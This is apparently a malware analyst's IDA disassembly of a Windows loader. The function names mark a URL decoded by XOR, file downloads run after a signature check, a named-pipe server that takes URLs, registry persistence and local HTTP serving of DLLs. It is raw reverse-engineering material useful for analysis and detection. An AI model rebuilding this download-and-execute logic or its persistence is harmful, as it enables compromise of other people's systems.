loc_9A8A0B: ; CODE XREF: sub_check_signature_and_create_process_from_file+5C�j
mov eax, [esi]
push ebx
xor ebx, ebx
dec eax
jz short loc_9A8A32
dec eax
jnz short loc_9A8A47
mov eax, [esi+4]
not eax
push 1 ; int
and eax, 1
push eax ; int
push dword ptr [esi+8] ; int
add esi, 0Ch
push esi ; Src
call sub_9A81B2
add esp, 10h
jmp short loc_9A8A40
; ---------------------------------------------------------------------------
loc_9A8A32: ; CODE XREF: sub_check_signature_and_create_process_from_file+68�j
push dword ptr [esi+8] ; nNumberOfBytesToWrite
add esi, 0Ch
push esi ; lpBuffer
call sub_create_process_for_validated_file
pop ecx
pop ecx
loc_9A8A40: ; CODE XREF: sub_check_signature_and_create_process_from_file+87�j
test eax, eax
jz short loc_9A8A47
xor ebx, ebx
inc ebx
loc_9A8A47: ; CODE XREF: sub_check_signature_and_create_process_from_file+6B�j
; sub_check_signature_and_create_process_from_file+99�j
push [ebp+Size] ; Size
push 0 ; Val
push edi ; Dst
call memset
add esp, 0Ch
mov esi, ebx
pop ebx
loc_9A8A58: ; CODE XREF: sub_check_signature_and_create_process_from_file+60�j
push edi ; hMem
call ds:GlobalFree
mov eax, esi
loc_9A8A61: ; CODE XREF: sub_check_signature_and_create_process_from_file+28�j
pop esi
loc_9A8A62: ; CODE XREF: sub_check_signature_and_create_process_from_file+13�j
pop edi
leave
retn
sub_check_signature_and_create_process_from_file endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8A65 proc near ; CODE XREF: sub_9A8AD0+2F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
xor edi, edi
cmp [ebx], edi
mov [ebp+var_8], edi
mov [ebp+var_4], edi
jbe short loc_9A8ACA
push esi
loc_9A8A78: ; CODE XREF: sub_9A8A65+62�j
mov edx, [ebp+arg_0]
mov eax, [edx+8]
lea esi, [ebx+edi+0Ch]
cmp eax, [esi+4]
ja short loc_9A8AB8
push dword ptr [esi]
call sub_9A87D0
test eax, eax
pop ecx
jnz short loc_9A8AB8
call sub_9A87A6
test eax, eax
jnz short loc_9A8AB8
mov eax, esi
call sub_check_signature_and_create_process_from_file
test eax, eax
mov [ebp+var_8], eax
jz short loc_9A8AB8
mov eax, [esi+4]
mov ecx, [ebp+arg_0]
cmp [ecx+8], eax
jnb short loc_9A8AB8
mov [ecx+8], eax
loc_9A8AB8: ; CODE XREF: sub_9A8A65+20�j
; sub_9A8A65+2C�j ...
mov eax, [esi+10h]
inc [ebp+var_4]
lea edi, [edi+eax+14h]
mov eax, [ebp+var_4]
cmp eax, [ebx]
jb short loc_9A8A78
pop esi
loc_9A8ACA: ; CODE XREF: sub_9A8A65+10�j
mov eax, [ebp+var_8]
pop edi
leave
retn
sub_9A8A65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8AD0(LPCRITICAL_SECTION lpCriticalSection,int,int,int)
sub_9A8AD0 proc near ; CODE XREF: sub_download_file_from_url+2E�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push edi
push [ebp+arg_8]
mov edi, ebx
call sub_9A8745
test eax, eax
pop ecx
jz short loc_9A8B43
push esi
mov esi, [ebp+lpCriticalSection]
push esi ; lpCriticalSection
call ds:EnterCriticalSection
and [ebp+arg_4], 0
cmp [ebp+arg_C], 0
jz short loc_9A8B14
push dword ptr [esi+3Ch]
call sub_9A8A65
test eax, eax
pop ecx
mov [ebp+arg_4], eax
jz short loc_9A8B14
mov eax, [esi+3Ch]
call sub_Call_Set_registry_Values
loc_9A8B14: ; CODE XREF: sub_9A8AD0+2A�j
; sub_9A8AD0+3A�j
lea edi, [esi+3Ch]
push ebx
push edi
call sub_9A8948
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_9A8B2F
mov eax, [edi]
call sub_Call_Set_registry_Values
mov ebx, eax
loc_9A8B2F: ; CODE XREF: sub_9A8AD0+54�j
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
xor eax, eax
cmp ebx, eax
pop esi
jz short loc_9A8B43
cmp [ebp+arg_4], eax
jz short loc_9A8B43
inc eax
loc_9A8B43: ; CODE XREF: sub_9A8AD0+15�j
; sub_9A8AD0+6B�j ...
pop edi
pop ebx
pop ebp
retn
sub_9A8AD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_InitializeCriticalSection_decrypt_files(LPCRITICAL_SECTION lpCriticalSection)
sub_InitializeCriticalSection_decrypt_files proc near ; CODE XREF: StartAddress+1F�p
hMem = dword ptr -4
lpCriticalSection= dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
push edi
mov edi, ds:InitializeCriticalSection
lea ebx, [esi+30h]
push esi ; lpCriticalSection
mov [ebx+4], ebx
mov [ebx], ebx
call edi ; InitializeCriticalSection
lea eax, [esi+18h]
push eax ; lpCriticalSection
call edi ; InitializeCriticalSection
lea eax, [esi+38h]
push eax
call sub_9A84E1
lea eax, [ebp+hMem]
push eax
push offset dword_9A2650
push offset byte_9A261C
lea eax, [ebp+lpCriticalSection]
lea ebx, [esi+3Ch]
call sub_Query_registry_Values
add esp, 10h
test eax, eax
jz short loc_9A8BAF
push [ebp+lpCriticalSection]
mov edi, [ebp+hMem]
call sub_9A8745
test eax, eax
pop ecx
jz short loc_9A8BA8
xor eax, eax
mov [ebx], edi
inc eax
jmp short loc_9A8BB6
; ---------------------------------------------------------------------------
loc_9A8BA8: ; CODE XREF: sub_InitializeCriticalSection_decrypt_files+58�j
push edi ; hMem
call ds:GlobalFree
loc_9A8BAF: ; CODE XREF: sub_InitializeCriticalSection_decrypt_files+48�j
push ebx
call sub_9A8698
pop ecx
loc_9A8BB6: ; CODE XREF: sub_InitializeCriticalSection_decrypt_files+5F�j
pop edi
mov [esi+40h], eax
pop esi
pop ebx
leave
retn
sub_InitializeCriticalSection_decrypt_files endp
; =============== S U B R O U T I N E =======================================
sub_9A8BBE proc near ; CODE XREF: sub_process_http_request_and_serve_dll_file+190�p
; sub_local_http_server_thread+4C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax+40h]
retn
sub_9A8BBE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8BC6(LPCRITICAL_SECTION lpCriticalSection)
sub_9A8BC6 proc near ; CODE XREF: StartAddress+1F0�p
lpCriticalSection= dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+lpCriticalSection]
push edi
mov edi, ds:EnterCriticalSection
push esi ; lpCriticalSection
call edi ; EnterCriticalSection
mov eax, [esi+3Ch]
call sub_Call_Set_registry_Values
mov ebx, ds:LeaveCriticalSection
push esi ; lpCriticalSection
mov [esp+14h+lpCriticalSection], eax
call ebx ; LeaveCriticalSection
lea ebp, [esi+18h]
push ebp ; lpCriticalSection
call edi ; EnterCriticalSection
push dword ptr [esi+38h]
add esi, 30h
push esi
call sub_9A8579
pop ecx
pop ecx
push ebp ; lpCriticalSection
mov esi, eax
call ebx ; LeaveCriticalSection
xor eax, eax
cmp [esp+10h+lpCriticalSection], eax
jz short loc_9A8C12
cmp esi, eax
jz short loc_9A8C12
inc eax
loc_9A8C12: ; CODE XREF: sub_9A8BC6+45�j
; sub_9A8BC6+49�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9A8BC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8C17(LPCRITICAL_SECTION lpCriticalSection,int)
sub_9A8C17 proc near ; CODE XREF: sub_9A9067+4B�p
; sub_process_http_request_and_serve_dll_file+3EE�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
lea eax, [esi+18h]
push edi
push eax ; lpCriticalSection
mov [ebp+lpCriticalSection], eax
call ds:EnterCriticalSection
mov ebx, [ebp+arg_4]
lea edi, [esi+38h]
add esi, 30h
call sub_9A8625
mov ebx, eax
test ebx, ebx
jz short loc_9A8C4D
push dword ptr [edi]
push esi
call sub_9A8579
pop ecx
pop ecx
mov ebx, eax
loc_9A8C4D: ; CODE XREF: sub_9A8C17+28�j
push [ebp+lpCriticalSection] ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_9A8C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8C5D(LPCRITICAL_SECTION lpCriticalSection,int)
sub_9A8C5D proc near ; CODE XREF: StartAddress+1EA�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
lea eax, [esi+18h]
push eax ; lpCriticalSection
mov [ebp+lpCriticalSection], eax
call ds:EnterCriticalSection
mov eax, [ebp+arg_4]
cmp eax, [esi+38h]
lea ebx, [esi+30h]
ja short loc_9A8CAA
push edi
mov edi, [ebx+4]
jmp short loc_9A8CA5
; ---------------------------------------------------------------------------
loc_9A8C83: ; CODE XREF: sub_9A8C5D+4A�j
mov eax, [ebp+arg_4]
cmp [esi+38h], eax
jbe short loc_9A8CA9
mov edx, edi
mov ecx, [edx]
lea eax, [edi+4]
mov edi, [eax]
mov eax, edi
mov [eax], ecx
push edx ; hMem
mov [ecx+4], eax
call ds:GlobalFree
dec dword ptr [esi+38h]
loc_9A8CA5: ; CODE XREF: sub_9A8C5D+24�j
cmp edi, ebx
jnz short loc_9A8C83
loc_9A8CA9: ; CODE XREF: sub_9A8C5D+2C�j
pop edi
loc_9A8CAA: ; CODE XREF: sub_9A8C5D+1E�j
push [ebp+lpCriticalSection] ; lpCriticalSection
call ds:LeaveCriticalSection
pop esi
pop ebx
pop ebp
retn
sub_9A8C5D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8CB7(LPCRITICAL_SECTION lpCriticalSection,int,int)
sub_9A8CB7 proc near ; CODE XREF: sub_process_http_request_and_serve_dll_file+27B�p
lpCriticalSection= dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push edi
mov edi, [esp+8+lpCriticalSection]
push edi ; lpCriticalSection
xor ebx, ebx
call ds:EnterCriticalSection
mov eax, [edi+3Ch]
test eax, eax
jz short loc_9A8CFC
push esi
mov esi, [eax+4]
add esi, 0Ch
push esi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
test eax, eax
mov ecx, [esp+0Ch+arg_4]
mov [ecx], eax
jz short loc_9A8CFB
push esi ; Size
push dword ptr [edi+3Ch] ; Src
push eax ; Dst
call memcpy
mov eax, [esp+18h+arg_8]
add esp, 0Ch
mov [eax], esi
inc ebx
loc_9A8CFB: ; CODE XREF: sub_9A8CB7+2E�j
pop esi
loc_9A8CFC: ; CODE XREF: sub_9A8CB7+14�j
push edi ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
mov eax, ebx
pop ebx
retn
sub_9A8CB7 endp
; =============== S U B R O U T I N E =======================================
sub_9A8D08 proc near ; CODE XREF: sub_9A8F28+1C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
lea ebx, [esi+18h]
push ebx ; lpCriticalSection
call ds:EnterCriticalSection
lea edi, [esi+30h]
mov esi, [edi]
jmp short loc_9A8D2F
; ---------------------------------------------------------------------------
loc_9A8D20: ; CODE XREF: sub_9A8D08+29�j
push [esp+0Ch+arg_8]
push dword ptr [esi+8]
call [esp+14h+arg_4]
mov esi, [esi]
pop ecx
pop ecx
loc_9A8D2F: ; CODE XREF: sub_9A8D08+16�j
cmp esi, edi
jnz short loc_9A8D20
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
pop ebx
retn
sub_9A8D08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_create_name_forpipe(char *Dest,size_t Count)
sub_create_name_forpipe proc near ; CODE XREF: sub_9A8D7E+16�p
; sub_SetNamedPipeServer+18�p
Buffer = byte ptr -104h
nSize = dword ptr -4
Dest = dword ptr 8
Count = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+nSize]
push eax ; nSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov [ebp+nSize], 100h
call ds:GetComputerNameA
push 7
lea eax, [ebp+Buffer]
push eax
push offset byte_9A268C ; Format
push [ebp+Count] ; Count
push [ebp+Dest] ; Dest
call ds:_snprintf
add esp, 14h
leave
retn
sub_create_name_forpipe endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8D7E(char *lpBuffer)
sub_9A8D7E proc near ; CODE XREF: sub_9A9067+65�p
Dest = byte ptr -10Ch
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
lea eax, [ebp+Dest]
push 104h ; Count
push eax ; Dest
call sub_create_name_forpipe
pop ecx
pop ecx
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_9A8DC5
xor eax, eax
jmp short loc_9A8DFE
; ---------------------------------------------------------------------------
loc_9A8DC5: ; CODE XREF: sub_9A8D7E+41�j
push esi
push [ebp+lpBuffer] ; Str
call strlen
pop ecx
push 0 ; lpOverlapped
lea esi, [eax+1]
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push ebx ; hFile
call ds:WriteFile
test eax, eax
jz short loc_9A8DF3
cmp esi, [ebp+NumberOfBytesWritten]
jnz short loc_9A8DF3
mov [ebp+var_4], 1
loc_9A8DF3: ; CODE XREF: sub_9A8D7E+67�j
; sub_9A8D7E+6C�j
push ebx ; hObject
call ds:CloseHandle
mov eax, [ebp+var_4]
pop esi
loc_9A8DFE: ; CODE XREF: sub_9A8D7E+45�j
pop ebx
leave
retn
sub_9A8D7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_Build_Ipv4DottedAddress_from_url_string proc near ; CODE XREF: sub_9A9067+26�p
Buf2 = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, eax
push esi ; Str
call ds:wcslen
shl eax, 1
cmp eax, 1F6h
pop ecx
jnb short loc_9A8E22
xor eax, eax
jmp loc_9A8F0F
; ---------------------------------------------------------------------------
loc_9A8E22: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+18�j
push ebx
push 0Ch ; Size
lea ebx, [esi+66h]
push offset loc_9BA9F0 ; Buf2
push ebx ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jz short loc_9A8E41
xor eax, eax
jmp loc_9A8F0E
; ---------------------------------------------------------------------------
loc_9A8E41: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+37�j
push edi
mov esi, 190h
push esi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov edi, eax
test edi, edi
jz loc_9A8F0D
push esi ; Size
push ebx ; Src
push edi ; Dst
call memcpy
add esp, 0Ch
push 15h
pop ecx
mov eax, ecx
loc_9A8E6A: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+70�j
xor byte ptr [eax+edi], 0C4h
inc eax
cmp eax, esi
jb short loc_9A8E6A
mov eax, dword_9A26A4
mov [ebp+Buf2], eax
mov eax, dword_9A26A8
or ebx, 0FFFFFFFFh
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
loc_9A8E89: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+A6�j
push 7 ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
mov eax, [ebp+var_4]
add eax, edi
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jz short loc_9A8EAB
inc [ebp+var_4]
cmp [ebp+var_4], esi
jb short loc_9A8E89
jmp short loc_9A8EAE
; ---------------------------------------------------------------------------
loc_9A8EAB: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+9E�j
mov ebx, [ebp+var_4]
loc_9A8EAE: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+A8�j
and [ebp+var_4], 0
cmp ebx, 0FFFFFFFFh
jz short loc_9A8F03
sub esi, ebx
cmp esi, [ebp+arg_4]
jb short loc_9A8EC1
mov esi, [ebp+arg_4]
loc_9A8EC1: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+BB�j
push esi ; Count
add ebx, edi
push ebx ; Source
mov ebx, [ebp+Dest]
push ebx ; Dest
call ds:strncpy
mov byte ptr [esi+ebx-1], 0
push 2Fh ; Val
add ebx, 7
push ebx ; Str
call ds:strchr
mov esi, eax
add esp, 14h
test esi, esi
jz short loc_9A8EFC
inc esi
push esi ; Str
call strlen
inc eax
push eax ; int
push esi ; int
push esi ; Str
call sub_9AD2C5
add esp, 10h
loc_9A8EFC: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+E6�j
mov [ebp+var_4], 1
loc_9A8F03: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+B4�j
push edi ; hMem
call ds:GlobalFree
mov eax, [ebp+var_4]
loc_9A8F0D: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+53�j
pop edi
loc_9A8F0E: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+3B�j
pop ebx
loc_9A8F0F: ; CODE XREF: sub_Build_Ipv4DottedAddress_from_url_string+1C�j
pop esi
leave
retn
sub_Build_Ipv4DottedAddress_from_url_string endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8F12(u_long hostlong,int)
sub_9A8F12 proc near ; DATA XREF: sub_9A8F28+12�o
hostlong = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push dword ptr [eax+4] ; Size
push dword ptr [eax] ; Src
push [esp+8+hostlong] ; hostlong
call sub_9AABAE
add esp, 0Ch
retn
sub_9A8F12 endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A8F28(LPVOID)
sub_9A8F28 proc near ; DATA XREF: sub_9A8F60+47�o
hMem = dword ptr 4
push esi
push edi
push 927C0h ; dwMilliseconds
call ds:Sleep
mov esi, [esp+8+hMem]
push esi
push offset sub_9A8F12
push offset CriticalSection
call sub_9A8D08
mov edi, ds:GlobalFree
add esp, 0Ch
push dword ptr [esi] ; hMem
call edi ; GlobalFree
push esi ; hMem
call edi ; GlobalFree
pop edi
xor eax, eax
pop esi
retn 4
sub_9A8F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8F60(void *Src,SIZE_T Size)
sub_9A8F60 proc near ; CODE XREF: sub_9AD6D4+89�p
ThreadId = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, ds:GlobalAlloc
push 8 ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9A8FC2
push ebx
mov ebx, [ebp+Size]
push ebx ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
xor edi, edi
cmp eax, edi
mov [esi], eax
jnz short loc_9A8F94
push esi ; hMem
call ds:GlobalFree
xor eax, eax
jmp short loc_9A8FC1
; ---------------------------------------------------------------------------
loc_9A8F94: ; CODE XREF: sub_9A8F60+27�j
push ebx ; Size
push [ebp+Src] ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push edi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A8F28 ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
mov [esi+4], ebx
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
xor eax, eax
inc eax
loc_9A8FC1: ; CODE XREF: sub_9A8F60+32�j
pop ebx
loc_9A8FC2: ; CODE XREF: sub_9A8F60+16�j
pop edi
pop esi
leave
retn
sub_9A8F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_download_file_from_url(LPVOID)
sub_download_file_from_url proc near ; DATA XREF: sub_thread_download_file_from_url+35�o
var_4 = dword ptr -4
lpszUrl = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push 0 ; int
lea eax, [ebp+var_4]
push eax ; int
push [ebp+lpszUrl] ; lpszUrl
call sub_download_file_from_URL
mov esi, ds:GlobalFree
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_9A9008
push 1 ; int
push [ebp+var_4] ; int
push edi ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8AD0
add esp, 10h
test eax, eax
jz short loc_9A9005
call sub_package_succesfully_downloaded_set_to_1_if_0
loc_9A9005: ; CODE XREF: sub_download_file_from_url+38�j
push edi ; hMem
call esi ; GlobalFree
loc_9A9008: ; CODE XREF: sub_download_file_from_url+21�j
push [ebp+lpszUrl] ; hMem
call esi ; GlobalFree
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_download_file_from_url endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_thread_download_file_from_url(char *Src)
sub_thread_download_file_from_url proc near ; CODE XREF: sub_9A9067:loc_9A90D3�p
; sub_SetNamedPipeServer+81�p
ThreadId = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push [ebp+Src] ; Str
call strlen
mov esi, eax
pop ecx
inc esi
push esi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov edi, eax
test edi, edi
jz short loc_9A9063
push esi ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy
add esp, 0Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push edi ; lpParameter
push offset sub_download_file_from_url ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
xor eax, eax
inc eax
loc_9A9063: ; CODE XREF: sub_thread_download_file_from_url+1F�j
pop edi
pop esi
leave
retn
sub_thread_download_file_from_url endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9067 proc near ; CODE XREF: sub_9AAD64+1C�p
Src = byte ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 114h
push offset stru_9A26B0
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push 104h
lea eax, [ebp+Src]
push eax
mov eax, [ebp+arg_0]
call sub_Build_Ipv4DottedAddress_from_url_string
pop ecx
pop ecx
test eax, eax
jz short loc_9A90E5
lea eax, [ebp+Src]
push eax ; Str1
call sub_check_string_format_is_http_url
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_9A90B9
push eax ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8C17
pop ecx
pop ecx
loc_9A90B9: ; CODE XREF: sub_9A9067+43�j
call ds:GetVersion
cmp ax, 5
lea eax, [ebp+Src]
push eax ; Src
jnz short loc_9A90D3
call sub_9A8D7E
jmp short loc_9A90D8
; ---------------------------------------------------------------------------
loc_9A90D3: ; CODE XREF: sub_9A9067+63�j
call sub_thread_download_file_from_url
loc_9A90D8: ; CODE XREF: sub_9A9067+6A�j
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A90E5
; ---------------------------------------------------------------------------
loc_9A90DE: ; DATA XREF: .text:stru_9A26B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A90E2: ; DATA XREF: .text:stru_9A26B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A90E5: ; CODE XREF: sub_9A9067+2F�j
; sub_9A9067+75�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9067 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_SetNamedPipeServer(LPVOID)
sub_SetNamedPipeServer proc near ; DATA XREF: StartAddress+64�o
var_511 = byte ptr -511h
Buffer = byte ptr -510h
Dest = byte ptr -110h
var_C = dword ptr -0Ch
NumberOfBytesRead= dword ptr -8
hObject = dword ptr -4
push ebp
mov ebp, esp
sub esp, 510h
push ebx
push esi
push edi
lea eax, [ebp+Dest]
push 104h ; Count
push eax ; Dest
call sub_create_name_forpipe
mov edi, ds:CreateNamedPipeA
pop ecx
pop ecx
mov ebx, 3E8h
mov esi, 400h
jmp short loc_9A9182
; ---------------------------------------------------------------------------
loc_9A9123: ; CODE XREF: sub_SetNamedPipeServer+AA�j
push 0 ; lpOverlapped
push [ebp+hObject] ; hNamedPipe
call ds:ConnectNamedPipe
mov [ebp+var_C], eax
call ds:GetLastError
cmp [ebp+var_C], 0
jnz short loc_9A9144
cmp eax, 217h
jnz short loc_9A91A3
loc_9A9144: ; CODE XREF: sub_SetNamedPipeServer+49�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push esi ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call ds:ReadFile
test eax, eax
jz short loc_9A9179
mov eax, [ebp+NumberOfBytesRead]
cmp [ebp+eax+var_511], 0
jnz short loc_9A9179
lea eax, [ebp+Buffer]
push eax ; Src
call sub_thread_download_file_from_url
pop ecx
loc_9A9179: ; CODE XREF: sub_SetNamedPipeServer+6B�j
; sub_SetNamedPipeServer+78�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
loc_9A9182: ; CODE XREF: sub_SetNamedPipeServer+2F�j
push 0 ; lpSecurityAttributes
push ebx ; nDefaultTimeOut
push esi ; nInBufferSize
push esi ; nOutBufferSize
push 0Ah ; nMaxInstances
push 4 ; dwPipeMode
lea eax, [ebp+Dest]
push 3 ; dwOpenMode
push eax ; lpName
call edi ; CreateNamedPipeA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz short loc_9A9123
xor eax, eax
inc eax
jmp short loc_9A91AE
; ---------------------------------------------------------------------------
loc_9A91A3: ; CODE XREF: sub_SetNamedPipeServer+50�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
xor eax, eax
loc_9A91AE: ; CODE XREF: sub_SetNamedPipeServer+AF�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_SetNamedPipeServer endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A91B5(BYTE Data)
sub_9A91B5 proc near ; CODE XREF: sub_process_http_request_and_serve_dll_file+3BA�p
Data = byte ptr 4
push esi
push edi
push dword ptr [esp+8+Data] ; Data
mov edi, offset word_9A26EE
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; hKey
call sub_9AD0F4
push dword ptr [esp+18h+Data] ; Data
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; hKey
call sub_9AD0F4
add esp, 20h
pop edi
pop esi
retn
sub_9A91B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A91E7 proc near ; CODE XREF: StartAddress+84�p
var_8 = dword ptr -8
Data = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and dword ptr [ebp+Data], 0
push esi
push edi
lea eax, [ebp+Data]
push eax ; lpData
mov edi, offset word_9A26EE
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; int
call sub_9AD112
lea eax, [ebp+var_8]
push eax ; lpData
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; int
call sub_9AD112
mov eax, [ebp+var_8]
add esp, 20h
cmp eax, dword ptr [ebp+Data]
pop edi
pop esi
ja short loc_9A9230
mov eax, dword ptr [ebp+Data]
loc_9A9230: ; CODE XREF: sub_9A91E7+44�j
mov ecx, [ebp+arg_0]
mov [ecx], eax
leave
retn
sub_9A91E7 endp
; =============== S U B R O U T I N E =======================================
sub_9A9237 proc near ; CODE XREF: sub_main+83�p
; sub_run_dll_remote_host+5C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push edi
or edi, 0FFFFFFFFh
test eax, eax
jz short loc_9A926B
mov edx, [esp+4+arg_0]
push ebx
push esi
loc_9A9249: ; CODE XREF: sub_9A9237+30�j
movzx ecx, byte ptr [edx]
push 8
inc edx
pop esi
loc_9A9250: ; CODE XREF: sub_9A9237+2D�j
mov ebx, ecx
xor ebx, edi
shr edi, 1
test bl, 1
jz short loc_9A9261
xor edi, 0EDB88320h
loc_9A9261: ; CODE XREF: sub_9A9237+22�j
shr ecx, 1
dec esi
jnz short loc_9A9250
dec eax
jnz short loc_9A9249
pop esi
pop ebx
